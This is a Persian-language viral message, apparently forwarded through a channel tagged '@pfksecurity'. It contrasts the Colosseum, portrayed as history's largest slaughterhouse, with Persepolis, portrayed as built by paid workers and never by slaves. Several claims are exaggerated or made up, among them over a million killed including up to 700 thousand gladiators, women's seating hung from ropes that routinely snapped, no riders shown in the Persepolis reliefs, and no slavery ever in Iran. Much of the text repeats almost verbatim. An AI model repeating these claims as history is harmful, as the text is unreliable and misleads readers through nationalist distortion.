ﺟﺎﻳﮕﺎﻩ ﻣﺨﺼﻮﺹ ﺯﻧﺎﻥ ﺩﺭ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺑﺴﻴﺎﺭ ﻧﺎﺍﻣﻦ ﻭ ﺧﻄﺮﻧﺎﻙ بوﺩ، ﭼﺮﺍ ﻛﻪ ﺳﻜﻮﻫﺎﻯ ﺁﻧﻬﺎ ﺑﺎ ﻃﻨﺎﺏ ﻫﺎﻳﻰ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﻣﻴﺸﺪ ﻛﻪ ﻫﺮ ﺍﺯ ﭼﻨﺪﻯ ﭘﺎﺭﻩ ﻣﻴﺸﺪﻧﺪ
ﻭ ﺯﻧﺎﻥ ﺍﺯ ﺍﺭﺗﻔﺎﻉ ٥٠ ﻣﺘﺮﻯ ﺑﻪ ﭘﺎﻳﻴﻦ ﺳﻘﻮﻃﻰ ﻣﺮﮔﺒﺎﺭ ﻣﻴﻜﺮﺩﻧﺪ . ﺍﻣﺎ ﺟﺎﻳﮕﺎﻩ ﻣﺮﺩﺍﻥ ﺑﺴﻴﺎﺭ ﺍﻣﻦ ﺑﻮﺩ . ﺁﻧﻬﺎ ﺑﺮ ﺭﻭﻯ ﺳﻜﻮﻫﺎﻯ ﺳﻨﮕﻰ ﻣﻰ ﻧﺸﺴﺘﻨﺪ .
ﻛﻮﻟﻮﺳﻴﻮﻡ، ﻣﺤﻞ ﺑﺮﮔﺰﺍﺭﻯ ﺟﺸﻨﻬﺎﻯ ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﺑﻮﺩ .
ﺩﺭ ﻃﻰ ﺍﻳﻦ ﺟﺸﻨﻬﺎ، ﻛﻪ ﻫﺮباﺭ ١٠٠ ﺭﻭﺯ ﺑﻪ ﺩﺭﺍﺯﺍ ﻣﻴﻜﺸﻴﺪ، ﺣﻴﻮﺍﻧﺎﺕ ﺩﺭﻧﺪﻩ ﺭﺍ ﺑﻪ ﺟﺎﻥ ﺑﺮﺩﮔﺎﻥ ﻭ ﮔﻼﺩﻳﺎﺗﻮﺭﻫﺎ ﻣﻰ ﺍﻧﺪﺍﺧﺘﻨﺪ ﻭ ﻳﺎ ﮔﻼﺩﻳﻮﺗﻮﺭﻫﺎ، ﻛﻪ ﺑﺮﺩﻩ ﺑﻮﺩﻧﺪ ﻭ ﺍﻣﻴﺪ ﺑﻪ ﺯﻧﺪﮔﻰ ﺁﻧﻬﺎ ﺑﻪ ﺳﺨﺘﻰ ﺑﻪ ٢٢ ﺳﺎﻟﮕﻰ ﻣﻴﺮﺳﻴﺪ، ﺭﺍ ﻣﺠﺒﻮﺭ ﺑﻪ ﻛﺸﺘﻦ ﻳﻜﺪﻳﮕﺮ ﻣﻴﻜﺮﺩﻧﺪ .
ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﻧﻴﺰ ﺷﺎﻫﺪ ﺍﻳﻦ ﻛﺸﺘﺎﺭ ﺑﻮﺩﻧﺪ ﻭ ﺍﺯ ﺁﻥ ﻟﺬﺕ ﻣﻴﺒﺮﺩﻧﺪ .
ﺩﺭ ﻃﻰ ﻫﺮ ﺩﻭﺭﻩ ﺍﺯ ﺍﻳﻦ ﺟﺸﻦ ﻫﺎ ﺣﺪﻭﺩ ٥ ﻫﺰﺍﺭ ﺑﺮﺩﻩ ﻭ ﮔﻼﺩﻳﻮﺗﻮﺭ ﺑﻪ ﻗﺘﻞ ﻣﻴﺮﺳﻴﺪﻧﺪ .
ﺩﺭ ﺭﻭﺯﻫﺎﻳﻰ ﻛﻪ ﺟﺸﻦ ﺑﺮﻗﺮﺍﺭ ﻧﺒﻮﺩ، ﻣﺤﻜﻮﻣﺎﻥ ﺑﻪ ﻣﺮﮒ ﺭﺍ ﺟﻠﻮﻯ ﺣﻴﻮﺍﻧﺎﺕ ﺩﺭﻧﺪﻩ ﻣﻰ ﺍﻧﺪﺍﺧﺘﻨﺪ ﺗﺎ ﺯﻧﺪﻩ ﺯﻧﺪﻩ ﺧﻮﺭﺩﻩ ﺷﻮﻧﺪ .
ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﻧﻴﺰ ﺷﺎﻫﺪ ﺯﻧﺪﻩ ﺯﻧﺪﻩ ﺧﻮﺭﺩﻩ ﺷﺪﻥ ﺍﻳﻦ ﺁﺩﻣﻴﺎﻥِ تیره ﺑﺨﺖ ﺑﻮﺩﻧﺪ .
ﺩﺭ ﻛﻞ،
*ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ، ﺍﺯ ﺟﻤﻠﻪ ٥٠٠ ﺗﺎ ٧٠٠ ﻫﺰﺍﺭ ﮔﻼﺩﻳﺎﺗﻮﺭ، ﺩﺭ ﺻﺤﻦ ﻛﻠﻮﺳﻴﻮﻡ ﺑﻪ ﻃﺮﺯ ﻭﺣﺸﻴﺎﻧﻪ ﺍﻯ ﻛﺸﺘﻪ ﺷﺪﻧﺪ* .
ﺍﻳﻦ ﻣﻴﺪﺍﻥ ﭼﻬﺎﺭ ﻫﺰﺍﺭ ﻣﺘﺮ ﻣﺮﺑﻌﻰ، ﺑﺰﺭﮔﺘﺮﻳﻦ ﻗﺘﻠﮕﺎﻩ ﺗﺎﺭﻳﺦ ﺑﺸﺮﻳﺖ ﺑﻮﺩﻩ ﺍﺳﺖ .
ﺍﻣﺮﻭﺯﻩ، ﻛﻮﻟﻮﺳﻴﻮﻡ ﻣﺤﺒﻮﺑﺘﺮﻳﻦ ﺑﻨﺎﻯ ﺍﻳﺘﺎﻟﻴﺎ، ﻧﻤﺎﺩ ﺷﻬﺮ ﺭﻡ ﻭ ﺗﻤﺪﻥ ﺭﻭﻣﻰ ﺍﺳﺖ .
ﻫﻤﻪ ﺭوﻣﻴﺎﻥ،ایتاﻟﻴﺎﻳﻴﻬﺎ ﻭ ﺣﺘﻰ ﺍﺭﻭﭘﺎﻳﻴﻬﺎ ﺑﻪ ﺍﻳﻦ ﺗﻤﺪﻥ ﺍﻓﺘﺨﺎﺭ ﻣﻴﻜﻨﻨﺪ . !
ﺩﺭ ﺳﺎﻝ ٢٠٠٧، ﺩﺭ ﻃﻰ ﻳﻚ ﻧﻈﺮﺳﻨﺠﻰ ﺑﺎ ﺷﺮﻛﺖ ﺑﻴﺶ ﺍﺯ ﻳﻜﺼﺪ ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ، *ﻛﻮﻟﻮﺳﻴﻮﻡ ﺟﺰﻭ ٧ ﺍﺛﺮ* ﺑﺮﺗﺮ ﻭ ﻣﺤﺒﻮﺏ ﺟﻬﺎﻥ ﺑﺮﮔﺰﻳﺪﻩ ﺷﺪ .!!!
ﺩﺭ ﺳﺎﻝ ٢٠١١، ﻣﺒﻠﻎ ٢٥ ﻣﻴﻠﻴﻮﻥ ﻳﻮﺭﻭ، ﺗﻨﻬﺎ ﺑﺮﺍﻯ ﺗﻤﻴﺰ ﻛﺮﺩﻥ ﺩﻳﻮﺍﺭﻫﺎﻯ ﻛﻮﻟﻮﺳﻴﻮﻡ ﻭ ﭼﻨﺪ ﻛﺎﺭ
ﺑﺴﻴﺎﺭ ﺟﺰﻳﻰ ﺩﻳﮕﺮ ﺩﺭ ﺩﺭﻭﻥ ﺁﻥ، ﻫﺰﻳﻨﻪ ﺷﺪ .
ﻳﻚ ﺿﺮﺏ ﺍﻟﻤﺜﻞ ﻗﺪﻳﻤﻰ ﺍﻳﺘﺎﻟﻴﺎﻳﻰ ﻣﻴﮕﻮﻳﺪ :
*" تازﻣﺎﻧﻰ ﻛﻪ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ، ﺭﻡ ﻧﻴﺰ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ".*
ﺣﺪﻭﺩ ٦٠٠ ﺳﺎﻝ ﭘﻴﺶ ﺍﺯ ﺳﺎﺧﺘﻪ ﺷﺪﻥ ﻛﻮﻟﻮﺳﻴﻮﻡ، ﺍﻳﺮﺍﻧﻴﺎﻥ *ﺗﺨﺖ ﺟﻤﺸﻴﺪ* ﺭﺍ ﺳﺎﺧﺘﻨﺪ .
*-ﺍﺛﺮﻯ ﭘﺮﺷﻜﻮﻩ ﺑﺎ ﺯﻳﺮﺑﻨﺎﻯ ١٧٥ ﻫﺰﺍﺭ ﻣﺘﺮ - ٨ ﺑﺮﺍﺑﺮ ﻛﻞ ﺯﻳﺮﺑﻨﺎﻯ ﻛﻮﻟﻮﺳﻴﻮﻡ* .
ﺑﺮ ﺍﺳﺎﺱ ﺳﻨﺪﻫﺎﻯ ﻏﻴﺮ ﻗﺎﺑﻞ ﺍﻧﻜﺎﺭ - ﺧﺸﺖ ﻫﺎﻯ ﭘﺨﺘﻪ ﺷﺪﻩ ﺁﻥ ﺯﻣﺎﻥ
*-ﺩﺭ ﺳﺎﺧﺘﻦ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻫﻴﭻ ﺑﺮﺩﻩ ﺍﻯ ﺑﻪ ﻛﺎﺭ ﮔﺮﻓﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ*.
ﻛﺎﺭﮔﺮﺍﻥ، ﻣﻬﻨﺪﺳﺎﻥ ﻭ ﻫﻨﺮﻣﻨﺪﺍﻥ ﺍﻳﺮﺍﻧﻰ ﺩﺭ ﺑﻬﺘﺮﻳﻦ ﺷﺮﺍﻳﻂِ ﻛﺎﺭﻯِ ﻣﻤﻜﻦ ﺍﻳﻦ ﺍﺛﺮ ﺑﺰﺭﮒ ﺑﺸﺮﻯ ﺭﺍ ﺁﻓﺮﻳﺪﻧﺪ .
ﭘﺎﺩﺷﺎﻫﺎﻥ ﺍﻳﺮﺍﻧﻰ ﺩﺭ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﺟﺸﻨﻬﺎﻯ ﺍﻳﺮﺍﻧﻰ ﻣﺎﻧﻨﺪ *ﻧﻮﺭﻭﺯﻭﻣﻬﺮﮔﺎﻥ*،
ﻛﻪ ﺭﻳﺸﻪ ﺩﺭ *ﺁﺷﺘﻰ، ﻣﻬﺮ، ﻃﺒﻴﻌﺖ ﻭ ﺯﻧﺪﮔﻰ ﺍﻧﺴﺎﻧﻰ ﺩﺍﺭﺩ*، ﺭﺍ ﺑﺮﭘﺎ ﻣﻴﺪﺍﺷﺘﻨﺪ .
ﻫﻤﻪ ﻧﮕﺎﺭﻩ ﻫﺎﻯ ﺣﻚ ﺷﺪﻩ ﺑﺮ ﺩﻳﻮﺍﺭﻫﺎ ﻭ ﺳﻨﮕﻬﺎﻯ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻧﺸﺎﻧﮕﺮ *ﺟﺸﻨﻬﺎ، ﻓﺮﻫﻨﮓ ﻭ ﻣﻴﺘﻮﻟﻮﮊﻯ ﺯﻳﺒﺎﻯ ﺍﻳﺮﺍﻧﻰاست.*
درتصاویرحکاکی شده برسنگ نبشته های تخت جمشید ،
هیچکس خشمگین وعصبانی نیست،
هیچکس سوار بر اسب نیست،
هیچکس رادرحال تعظیم نمی بینید،
هیچ زمان برده داری در ایران نبوده،
درمیان این همه پیکر تراشیده شده، حتی یک نقش،تصویر وچهره ی برهنه وجود ندارد.
*ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻣﺮﻛﺰ ﺑﺰﺭﮔﺘﺮﻳﻦ ﻗﺪﺭﺕ ﺟﻬﺎﻥ ﺩﺭ ﺁﻥ ﺭﻭﺯﮔﺎﺭ ﺑﻮﺩﻩ ﺍﺳﺖ* .
ﺍﻣﺎ ﺑﺮﺧﻮﺭﺩ ﺑﺮﺧﻰ ﺍﺯ ﻣﺎ ﺍﻳﺮﺍﻧﻴﺎﻥ، ﺑﻪ ﻭﻳﮋﻩ واپسگرایان ﻭ ﺑﺮﺧﻰ ﻣﺪﻋﻴﺎﻥ ﺭﻭﺷﻨﻔﻜﺮﻯ، ﺑﺎ ﺍﻳﻦ ﺍﺛﺮ ﺑﺰﺭﮒ ﻫﻨﺮﻯ ﺟﻬﺎﻥ ﺑﺴﻴﺎﺭ ﻏﻴﺮﺩﻭﺳﺘﺎﻧﻪ ﻭ ﻧﺎﺑﺨﺮﺩﺍﻧﻪ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﺩﺭ ﺗﺨﺖ ﺟﻤﺸﯿﺪ ۳۲ ﻫﺰﺍﺭ ﻟﻮﺡ ﮔﻠﯽ ﺑﺪﺳﺖ آﻣﺪﻩ ﮐﻪ ﺩﺭ ﺍﻥ ﺷﺮﺡ ﻭﻗﺎﯾﻊ ﺭﻭﺯﺍﻧﻪ ﺭﺍ ﺩﺭ ﻣﺮﺍﺣﻞ ﺳﺎﺧﺖ ﺍﯾﻦ ﺑﻨﺎﯼ ﺑﺎﺷﮑﻮﻩ ﺑﯿﺎﻥ ﻣﯿﮑﻨﺪ ﺑﺎ ﺗﻤﺎﻡ ﺟﺰﺋﯿﺎﺕ ﻣﺜل ﺍﯾﻨﮑﻪ ﮐﺎﺭﮔﺮﺍﻥ و ﻣﻬﻨﺪﺳﺎﻥ ﻫﺮ ﮐﺪﺍﻡ ﺑﻪ ﻧﻮﻉ ﺗﺨﺼﺼﯽ ﮐﻪ ﺩﺍﺭند ﭼﻪ ﻣﯿﺰﺍﻥ ﺣﻘﻮﻕ ﺩﺭﯾﺎﻓﺖ ﻣﯿﮑﻨﻨﺪ،
*ﮐﺸﻮﺭﻫﺎﯼ ﺩﺍﻋﯿﻪ ﺩﺍﺭ ﺣﻘﻮﻕ ﺑﺸﺮ ﺑﻪ ﭼﻪ ﭼﯿﺰﯼ ﻣﻔﺘﺨﺮﻥ ﻭ ﻣﺎ ﭼﻪ ﭼﯿﺰﯼ ﺭﺍ ﻟﻌﻦ ﻭ ﻧﻔﺮﯾﻦ ﻣﯿﮑﻨﯿﻢ ﻭ ﻧﻤﺎﺩﯼ ﺍﺯ ﻇﻠﻢ ﻭ ﺳﺘﻢ ﺟﺒﺎﺭﺍﻥ ﻭ ﺳﺘﻤﮕﺮﺍﻥ ﺭﻭﺯﮔﺎﺭ ﻣﯿﺪاﻧﯿﻢ*.
ﺑﺎﻭﺭ ﮐﻨﯿﺪ ﻫﯿﭻ ﻣﻠﺘﯽ ﺩﺭ ﺩﻧﯿﺎ ﭼﻨﯿﻦ ﮐﻤﺮ ﺑﻪ ﺗﺨﺮﯾﺐ ﻫﻮﯾﺖ ﻭ ﻣﻠﯿﺖ ﻭ ﺗﺎﺭﯾﺦ ﺧﻮﺩ ﻧﺒﺴﺘﻪ ﮐﻪ ﻣﺎ ﺑﺴﺘﻪ ﺍﻳﻢ.
ﺩﺭ ﺍﻧﮕﻠﺴﺘﺎﻥ کاسه ﺳﯿﺼﺪ ﺳﺎﻟﻪ ﭘﯿﺪﺍ ﻣﯿﺸﻮﺩ ﻭ ﺭﺳﺎﻧﻪ ﻫﺎﻳﺸﺎﻥ ﮔﻮﺵ ﺩﻧﯿﺎ ﺭﺍ ﮐﺮ ﻣﯿﮑﻨﻨﺪ
ﻭلی ﻣﺎ ﺗﭙﻪ ﻫﺎ ﻭ ﻣﺤﻮﻃﻪ ﻫﺎﯼ ۷۰۰۰ ﺳﺎﻟﻪ ﮐﻪ ﻣﺪﻧﯿﺖ ﺩﻧﯿﺎ ﺩﺭ آﻥ ﻣﺘﻮﻟﺪ ﺷﺪﻩ ﺭﺍ ﺑﺎ ﻟﻮﺩﺭ ﺗﺨﺮﯾﺐ ﻣﻲ کنیم !!
ﺗﻔﺎﻭﺕ
*ﺍﯾﺮﺍﻥ ﻭ ﺍﺭﻭﭘﺎ!!!*
ﺗﻔﺎﻭﺕ
*( ﺗﺨﺖ ﺟﻤﺸﯿﺪ ) ﺑﺎ( ﮐﻮﻟﻮﺳﯿﻮﻡ)*
@pfksecurity
ﺣﺪﻭﺩ ٤٥ ﺗﺎ ٦٠ ﻫﺰﺍﺭ ﻧﻔﺮ ﺍﺯ ﺍﻳﻦ ﺑﺮﺩﮔﺎﻥ، ﺑﺮﺍﻯ ﺳﺎﺧﺘﻦ *ﻛﻮﻟﻮﺳﻴﻮﻡ* ﺑﻪ ﻛﺎﺭﮔﺮﻓﺘﻪ ﺷﺪﻧﺪ .
ﺑﺨﺶ ﺑﺰﺭﮔﻰ ﺍﺯ ﺍﻳﻦ ﺑﺮﺩﮔﺎﻥ ﺩﺭ ﺣﻴﻦ ﻛﺎﺭ ﻛﺸﺘﻪ ﺷﺪﻧﺪ .
ﻣﺮﺍﺳﻢ ﺍﻓﺘﺘﺎﺣﻴﻪ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺑﺎ ﻛﺸﺘﺎﺭ ٩ ﻫﺰﺍﺭ ﺣﻴﻮﺍﻥ ﻏﻴﺮﺍﻫﻠﻰ ﺑﺮﮔﺰﺍﺭ ﺷﺪ .
ﺩﺭ ﻛﻮﻟﺴﻴﻮﻡ ﺯﻧﺎﻥ ﻭ ﻣﺮﺩﺍﻥ ﺍﺯ ﻫﻢ ﺟﺪﺍ ﺑﻮﺩﻧﺪ .
ﺟﺎﻳﮕﺎﻩ ﺯﻧﺎﻥ ﺩﺭ ﻃﺒﻘﻪ ﭘﻨﺠﻢ ﺑﻮﺩ، ﻛﻪ ﺩﻳد بسیار ﺑﺪﻯ ﺑﻪ ﻣﻴﺪﺍﻥ ﺩﺍﺷﺖ .
ﺟﺎﻳﮕﺎﻩ ﻣﺨﺼﻮﺹ ﺯﻧﺎﻥ ﺩﺭ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺑﺴﻴﺎﺭ ﻧﺎﺍﻣﻦ ﻭ ﺧﻄﺮﻧﺎﻙ بوﺩ، ﭼﺮﺍ ﻛﻪ ﺳﻜﻮﻫﺎﻯ ﺁﻧﻬﺎ ﺑﺎ ﻃﻨﺎﺏ ﻫﺎﻳﻰ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﻣﻴﺸﺪ ﻛﻪ ﻫﺮ ﺍﺯ ﭼﻨﺪﻯ ﭘﺎﺭﻩ ﻣﻴﺸﺪﻧﺪ
ﻭ ﺯﻧﺎﻥ ﺍﺯ ﺍﺭﺗﻔﺎﻉ ٥٠ ﻣﺘﺮﻯ ﺑﻪ ﭘﺎﻳﻴﻦ ﺳﻘﻮﻃﻰ ﻣﺮﮔﺒﺎﺭ ﻣﻴﻜﺮﺩﻧﺪ . ﺍﻣﺎ ﺟﺎﻳﮕﺎﻩ ﻣﺮﺩﺍﻥ ﺑﺴﻴﺎﺭ ﺍﻣﻦ ﺑﻮﺩ . ﺁﻧﻬﺎ ﺑﺮ ﺭﻭﻯ ﺳﻜﻮﻫﺎﻯ ﺳﻨﮕﻰ ﻣﻰ ﻧﺸﺴﺘﻨﺪ .
ﻛﻮﻟﻮﺳﻴﻮﻡ، ﻣﺤﻞ ﺑﺮﮔﺰﺍﺭﻯ ﺟﺸﻨﻬﺎﻯ ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﺑﻮﺩ .
ﺩﺭ ﻃﻰ ﺍﻳﻦ ﺟﺸﻨﻬﺎ، ﻛﻪ ﻫﺮباﺭ ١٠٠ ﺭﻭﺯ ﺑﻪ ﺩﺭﺍﺯﺍ ﻣﻴﻜﺸﻴﺪ، ﺣﻴﻮﺍﻧﺎﺕ ﺩﺭﻧﺪﻩ ﺭﺍ ﺑﻪ ﺟﺎﻥ ﺑﺮﺩﮔﺎﻥ ﻭ ﮔﻼﺩﻳﺎﺗﻮﺭﻫﺎ ﻣﻰ ﺍﻧﺪﺍﺧﺘﻨﺪ ﻭ ﻳﺎ ﮔﻼﺩﻳﻮﺗﻮﺭﻫﺎ، ﻛﻪ ﺑﺮﺩﻩ ﺑﻮﺩﻧﺪ ﻭ ﺍﻣﻴﺪ ﺑﻪ ﺯﻧﺪﮔﻰ ﺁﻧﻬﺎ ﺑﻪ ﺳﺨﺘﻰ ﺑﻪ ٢٢ ﺳﺎﻟﮕﻰ ﻣﻴﺮﺳﻴﺪ، ﺭﺍ ﻣﺠﺒﻮﺭ ﺑﻪ ﻛﺸﺘﻦ ﻳﻜﺪﻳﮕﺮ ﻣﻴﻜﺮﺩﻧﺪ .
ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﻧﻴﺰ ﺷﺎﻫﺪ ﺍﻳﻦ ﻛﺸﺘﺎﺭ ﺑﻮﺩﻧﺪ ﻭ ﺍﺯ ﺁﻥ ﻟﺬﺕ ﻣﻴﺒﺮﺩﻧﺪ .
ﺩﺭ ﻃﻰ ﻫﺮ ﺩﻭﺭﻩ ﺍﺯ ﺍﻳﻦ ﺟﺸﻦ ﻫﺎ ﺣﺪﻭﺩ ٥ ﻫﺰﺍﺭ ﺑﺮﺩﻩ ﻭ ﮔﻼﺩﻳﻮﺗﻮﺭ ﺑﻪ ﻗﺘﻞ ﻣﻴﺮﺳﻴﺪﻧﺪ .
ﺩﺭ ﺭﻭﺯﻫﺎﻳﻰ ﻛﻪ ﺟﺸﻦ ﺑﺮﻗﺮﺍﺭ ﻧﺒﻮﺩ، ﻣﺤﻜﻮﻣﺎﻥ ﺑﻪ ﻣﺮﮒ ﺭﺍ ﺟﻠﻮﻯ ﺣﻴﻮﺍﻧﺎﺕ ﺩﺭﻧﺪﻩ ﻣﻰ ﺍﻧﺪﺍﺧﺘﻨﺪ ﺗﺎ ﺯﻧﺪﻩ ﺯﻧﺪﻩ ﺧﻮﺭﺩﻩ ﺷﻮﻧﺪ .
ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﻧﻴﺰ ﺷﺎﻫﺪ ﺯﻧﺪﻩ ﺯﻧﺪﻩ ﺧﻮﺭﺩﻩ ﺷﺪﻥ ﺍﻳﻦ ﺁﺩﻣﻴﺎﻥِ تیره ﺑﺨﺖ ﺑﻮﺩﻧﺪ .
ﺩﺭ ﻛﻞ،
*ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ، ﺍﺯ ﺟﻤﻠﻪ ٥٠٠ ﺗﺎ ٧٠٠ ﻫﺰﺍﺭ ﮔﻼﺩﻳﺎﺗﻮﺭ، ﺩﺭ ﺻﺤﻦ ﻛﻠﻮﺳﻴﻮﻡ ﺑﻪ ﻃﺮﺯ ﻭﺣﺸﻴﺎﻧﻪ ﺍﻯ ﻛﺸﺘﻪ ﺷﺪﻧﺪ* .
ﺍﻳﻦ ﻣﻴﺪﺍﻥ ﭼﻬﺎﺭ ﻫﺰﺍﺭ ﻣﺘﺮ ﻣﺮﺑﻌﻰ، ﺑﺰﺭﮔﺘﺮﻳﻦ ﻗﺘﻠﮕﺎﻩ ﺗﺎﺭﻳﺦ ﺑﺸﺮﻳﺖ ﺑﻮﺩﻩ ﺍﺳﺖ .
ﺍﻣﺮﻭﺯﻩ، ﻛﻮﻟﻮﺳﻴﻮﻡ ﻣﺤﺒﻮﺑﺘﺮﻳﻦ ﺑﻨﺎﻯ ﺍﻳﺘﺎﻟﻴﺎ، ﻧﻤﺎﺩ ﺷﻬﺮ ﺭﻡ ﻭ ﺗﻤﺪﻥ ﺭﻭﻣﻰ ﺍﺳﺖ .
ﻫﻤﻪ ﺭوﻣﻴﺎﻥ،ایتاﻟﻴﺎﻳﻴﻬﺎ ﻭ ﺣﺘﻰ ﺍﺭﻭﭘﺎﻳﻴﻬﺎ ﺑﻪ ﺍﻳﻦ ﺗﻤﺪﻥ ﺍﻓﺘﺨﺎﺭ ﻣﻴﻜﻨﻨﺪ . !
ﺩﺭ ﺳﺎﻝ ٢٠٠٧، ﺩﺭ ﻃﻰ ﻳﻚ ﻧﻈﺮﺳﻨﺠﻰ ﺑﺎ ﺷﺮﻛﺖ ﺑﻴﺶ ﺍﺯ ﻳﻜﺼﺪ ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ، *ﻛﻮﻟﻮﺳﻴﻮﻡ ﺟﺰﻭ ٧ ﺍﺛﺮ* ﺑﺮﺗﺮ ﻭ ﻣﺤﺒﻮﺏ ﺟﻬﺎﻥ ﺑﺮﮔﺰﻳﺪﻩ ﺷﺪ .!!!
ﺩﺭ ﺳﺎﻝ ٢٠١١، ﻣﺒﻠﻎ ٢٥ ﻣﻴﻠﻴﻮﻥ ﻳﻮﺭﻭ، ﺗﻨﻬﺎ ﺑﺮﺍﻯ ﺗﻤﻴﺰ ﻛﺮﺩﻥ ﺩﻳﻮﺍﺭﻫﺎﻯ ﻛﻮﻟﻮﺳﻴﻮﻡ ﻭ ﭼﻨﺪ ﻛﺎﺭ
ﺑﺴﻴﺎﺭ ﺟﺰﻳﻰ ﺩﻳﮕﺮ ﺩﺭ ﺩﺭﻭﻥ ﺁﻥ، ﻫﺰﻳﻨﻪ ﺷﺪ .
ﻳﻚ ﺿﺮﺏ ﺍﻟﻤﺜﻞ ﻗﺪﻳﻤﻰ ﺍﻳﺘﺎﻟﻴﺎﻳﻰ ﻣﻴﮕﻮﻳﺪ :
*" تازﻣﺎﻧﻰ ﻛﻪ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ، ﺭﻡ ﻧﻴﺰ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ".*
ﺣﺪﻭﺩ ٦٠٠ ﺳﺎﻝ ﭘﻴﺶ ﺍﺯ ﺳﺎﺧﺘﻪ ﺷﺪﻥ ﻛﻮﻟﻮﺳﻴﻮﻡ، ﺍﻳﺮﺍﻧﻴﺎﻥ *ﺗﺨﺖ ﺟﻤﺸﻴﺪ* ﺭﺍ ﺳﺎﺧﺘﻨﺪ .
*-ﺍﺛﺮﻯ ﭘﺮﺷﻜﻮﻩ ﺑﺎ ﺯﻳﺮﺑﻨﺎﻯ ١٧٥ ﻫﺰﺍﺭ ﻣﺘﺮ - ٨ ﺑﺮﺍﺑﺮ ﻛﻞ ﺯﻳﺮﺑﻨﺎﻯ ﻛﻮﻟﻮﺳﻴﻮﻡ* .
ﺑﺮ ﺍﺳﺎﺱ ﺳﻨﺪﻫﺎﻯ ﻏﻴﺮ ﻗﺎﺑﻞ ﺍﻧﻜﺎﺭ - ﺧﺸﺖ ﻫﺎﻯ ﭘﺨﺘﻪ ﺷﺪﻩ ﺁﻥ ﺯﻣﺎﻥ
*-ﺩﺭ ﺳﺎﺧﺘﻦ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻫﻴﭻ ﺑﺮﺩﻩ ﺍﻯ ﺑﻪ ﻛﺎﺭ ﮔﺮﻓﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ*.
ﻛﺎﺭﮔﺮﺍﻥ، ﻣﻬﻨﺪﺳﺎﻥ ﻭ ﻫﻨﺮﻣﻨﺪﺍﻥ ﺍﻳﺮﺍﻧﻰ ﺩﺭ ﺑﻬﺘﺮﻳﻦ ﺷﺮﺍﻳﻂِ ﻛﺎﺭﻯِ ﻣﻤﻜﻦ ﺍﻳﻦ ﺍﺛﺮ ﺑﺰﺭﮒ ﺑﺸﺮﻯ ﺭﺍ ﺁﻓﺮﻳﺪﻧﺪ .
ﭘﺎﺩﺷﺎﻫﺎﻥ ﺍﻳﺮﺍﻧﻰ ﺩﺭ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﺟﺸﻨﻬﺎﻯ ﺍﻳﺮﺍﻧﻰ ﻣﺎﻧﻨﺪ *ﻧﻮﺭﻭﺯﻭﻣﻬﺮﮔﺎﻥ*،
ﻛﻪ ﺭﻳﺸﻪ ﺩﺭ *ﺁﺷﺘﻰ، ﻣﻬﺮ، ﻃﺒﻴﻌﺖ ﻭ ﺯﻧﺪﮔﻰ ﺍﻧﺴﺎﻧﻰ ﺩﺍﺭﺩ*، ﺭﺍ ﺑﺮﭘﺎ ﻣﻴﺪﺍﺷﺘﻨﺪ .
ﻫﻤﻪ ﻧﮕﺎﺭﻩ ﻫﺎﻯ ﺣﻚ ﺷﺪﻩ ﺑﺮ ﺩﻳﻮﺍﺭﻫﺎ ﻭ ﺳﻨﮕﻬﺎﻯ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻧﺸﺎﻧﮕﺮ *ﺟﺸﻨﻬﺎ، ﻓﺮﻫﻨﮓ ﻭ ﻣﻴﺘﻮﻟﻮﮊﻯ ﺯﻳﺒﺎﻯ ﺍﻳﺮﺍﻧﻰاست.*
درتصاویرحکاکی شده برسنگ نبشته های تخت جمشید ،
هیچکس خشمگین وعصبانی نیست،
هیچکس سوار بر اسب نیست،
هیچکس رادرحال تعظیم نمی بینید،
هیچ زمان برده داری در ایران نبوده،
درمیان این همه پیکر تراشیده شده، حتی یک نقش،تصویر وچهره ی برهنه وجود ندارد.
*ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻣﺮﻛﺰ ﺑﺰﺭﮔﺘﺮﻳﻦ ﻗﺪﺭﺕ ﺟﻬﺎﻥ ﺩﺭ ﺁﻥ ﺭﻭﺯﮔﺎﺭ ﺑﻮﺩﻩ ﺍﺳﺖ* .
